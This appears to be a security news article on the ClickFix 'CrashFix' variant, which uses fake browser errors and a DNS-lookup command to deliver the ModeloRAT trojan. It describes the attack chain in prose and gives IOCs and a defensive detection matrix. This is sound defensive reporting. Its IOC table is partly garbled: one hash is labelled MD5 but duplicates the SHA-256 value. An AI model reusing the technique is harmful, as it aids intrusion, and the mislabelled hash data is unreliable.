ClickFix Malware Variant Delivers ModeloRAT via CrashFix Technique
Cybersecurity researchers have identified a new wave of ClickFix attacks, a social engineering technique increasingly exploited by both cybercriminals and state-sponsored groups. Microsoft recently warned that attackers are now leveraging a CrashFix variant of ClickFix to distribute ModeloRAT, a remote access trojan (RAT) targeting enterprise environments.
How ClickFix Works
The ClickFix attack chain relies on deception rather than traditional exploits:
- Attackers display a fake error message on compromised or malicious websites.
- Victims are instructed to press specific keys or run commands to “fix” the issue.
- By following these steps, users unknowingly grant elevated permissions, execute attacker-supplied scripts, or download malware.
Technical Breakdown of the CrashFix Variant
Microsoft observed a recent campaign where attackers instructed victims to run a cmd.exe command that:
- Performs a DNS lookup against a hard-coded external DNS server (instead of the system’s default resolver).
- Filters the output to extract the “Name:” field from the DNS response.
- Executes this extracted value as the second-stage payload.
This DNS-based tactic allows attackers to:
- Blend malicious traffic into normal network activity.
- Validate execution before delivering the next stage.
- Evade detection by traditional security tools.
Payload Delivery
- Stage 1: DNS lookup command execution.
- Stage 2: Malicious Python script for reconnaissance.
- Stage 3: Deployment of ModeloRAT, which enables:
- System information collection
- Execution of additional payloads
- Persistence mechanisms for long-term access
Huntress Findings: KongTuke Campaign
Security firm Huntress linked the CrashFix variant to a threat actor known as KongTuke. Their campaign involved:
- A malicious browser extension named NexShield, impersonating uBlock Origin Lite.
- Fake pop-ups claiming the browser had “stopped abnormally.”
- Delivery of ModeloRAT as the final payload.
The campaign specifically targeted corporate environments, highlighting the attacker’s focus on enterprise compromise.
Why This Matters
- User deception bypasses traditional defenses: No exploit is needed; attackers rely on tricking users.
- Persistence and control: ModeloRAT ensures long-term access to compromised systems.
- Detection evasion: DNS-based payload delivery blends into legitimate traffic.
Indicators of Compromise (IOCs)
| Record type | Info | Value |
| NS | TTL 21600 | otto.ns.cloudflare.com |
| NS | TTL 21600 | ursula.ns.cloudflare.com |
| NS | TTL 1800 | otto.ns.cloudflare.com |
| Domain | nexsnield.com | |
| Domain | www.matbao.net | |
| Domain | nexsnield.com | |
| Domain | www.nexsnield.com | |
| a3a06422e0a35c7722fce88343f32a6d | ||
| Hash | MD5 | fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67 |
| Hash | SHA-256 | fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67 |
| IP Address | v4 | 216.150.1.1 || 170.168.103.0 – 170.168.103.255 || 144.31.221[.]197 |
Defensive Detection Matrix (ClickFix / CrashFix / ModeloRAT)
| MITRE ATT&CK Technique | Detection Focus | Recommended Logging / Rules |
| T1189 – Drive-by Compromise | Malicious websites serving fake error messages | Web proxy logs, DNS filtering, URL reputation checks. Detect abnormal redirects or domains flagged as suspicious. |
| T1204.004 – User Execution: Malicious Copy/Paste | Users running attacker-supplied commands | Endpoint monitoring for unusual clipboard activity, PowerShell/Command Prompt execution logs. Alert on commands copied from browsers. |
| T1059.003 – Command Interpreter (cmd.exe) | DNS lookup via hard-coded external resolver | Sysmon Event ID 1 (process creation). Detect nslookup or cmd.exe with external DNS server arguments. |
| T1071.004 – Application Layer Protocol: DNS | DNS used for payload delivery | DNS query logs. Flag queries to uncommon external resolvers or domains with suspicious response patterns. |
| T1027 – Obfuscated Payloads | DNS response parsed into executable payload | Monitor for scripts parsing DNS output. Detect unusual string extraction from DNS responses. |
| T1082 – System Information Discovery | ModeloRAT reconnaissance | EDR telemetry. Detect scripts querying system info (hostname, OS version, hardware). |
| T1046 – Network Service Scanning | Python script scanning network | Network IDS/IPS. Alert on Python processes generating high-volume outbound traffic. |
| T1547 – Persistence via Autostart | ModeloRAT persistence | Registry monitoring (Run keys), scheduled tasks, startup folder changes. |
| T1219 – Remote Access Trojan (ModeloRAT) | RAT activity | Detect anomalous outbound connections, persistence artifacts, and RAT-specific signatures. |
| T1041 – Exfiltration Over C2 Channel | Data sent via RAT | Monitor for unusual outbound traffic volume, encrypted channels to unknown IPs/domains. |
SOC Hunting Recommendations
- Correlate DNS anomalies: Look for DNS queries to hard-coded resolvers followed by process creation events.
- User behavior monitoring: Flag when users run commands copied from browsers or error pop-ups.
- Python script detection: Hunt for Python processes performing reconnaissance or scanning.
- Persistence checks: Regularly audit autostart entries for unauthorized additions.
- ModeloRAT signatures: Deploy YARA/Sigma rules for known ModeloRAT artifacts.
Reference :
Follow Us On – X.com, Telegram, LinkedIN, Discord Server,
For The Latest Updates, Vulnerability Insights, Security News, Cyberattack Scoops And Cybersecurity Best Practices Delivered Straight To Your Inbox – Subscribe To Our Newsletter
